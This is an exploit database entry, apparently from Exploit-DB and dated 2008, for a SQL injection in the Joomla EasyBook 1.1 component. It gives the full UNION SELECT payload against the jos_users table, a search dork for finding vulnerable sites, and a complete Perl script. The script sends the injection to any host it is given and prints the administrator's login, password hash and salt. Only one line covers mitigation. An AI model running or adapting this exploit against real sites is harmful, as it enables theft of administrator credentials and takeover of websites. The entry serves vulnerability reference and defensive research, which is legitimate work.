Joomla Component EasyBook 1.1 SQL Injection Exploit

vendor:

EasyBook

by:

ZAMUT

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: EasyBook

Affected Version From: 1.1

Affected Version To: 1.1

Patch Exists: Yes

Related CWE: N/A

CPE: a:joomla:easybook

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Joomla Component EasyBook 1.1 SQL Injection Exploit

This exploit is for Joomla Component EasyBook 1.1. It is a SQL injection vulnerability that allows an attacker to gain access to the admin credentials. The exploit is done by sending a POST request to the index.php page with the option parameter set to com_easybook, Itemid set to 1, func set to deleteentry, gbid set to -1 union select 1,2,concat(0x3A3A3A,username,0x3a,password,0x3A3A3A),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from jos_users/* and md set to the md parameter. The response will contain the admin login, hash and salt.

Mitigation:

The best way to mitigate this vulnerability is to upgrade to the latest version of Joomla Component EasyBook.

Source

Exploit-DB raw data:

#!/usr/bin/perl
use IO::Socket;
use strict;

##### INFO##############################
# Example:                             #
# Host: xxx.lu  	               #
# &md: 0f8ab366793a0d1da85c6f5a8d4fb576#
########################################


print "-+--[ Joomla Component EasyBook 1.1 SQL Injection Exploit]--+-\n";
print "-+--                                                      --+-\n";
print "-+--            Author: ZAMUT                             --+-\n";
print "-+--            Vuln: gbid=                               --+-\n";
print "-+--            Homepage: http://antichat.ru              --+-\n";
print "-+--            Dork: com_easybook                        --+-\n\n";

print "Host:" ;
chomp(my $host=<STDIN>);
print "&md=";
chomp(my $md=<STDIN>);

my ($socket,$lhs,$l,$h,$s);
$socket = IO::Socket::INET->new("$host:80") || die("Can't connecting!");
print $socket  "POST /index.php HTTP/1.0\n".
               "Host: www.$host\n".
			   "Content-Type: application/x-www-form-urlencoded\n".
			   "Content-Length: 214\n\n".
               "option=com_easybook&Itemid=1&func=deleteentry&gbid=-1+union+select+1,2,concat(0x3A3A3A,username,0x3a,password,0x3A3A3A),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+from+jos_users/*&md=$md\n";
  while(<$socket>)
  {
	 $s = <$socket>;
	 if($s=~/:::(.+):::/){
		   $lhs = $1;
	       ($l,$h,$s)=split(':',$lhs);
		   print "\nAdmin Login:$l\nHash:$h\nSalt:$s\n";
		   close $socket; 
		   exit; }
  }
  die ("Exploit failed!");

# milw0rm.com [2008-06-04]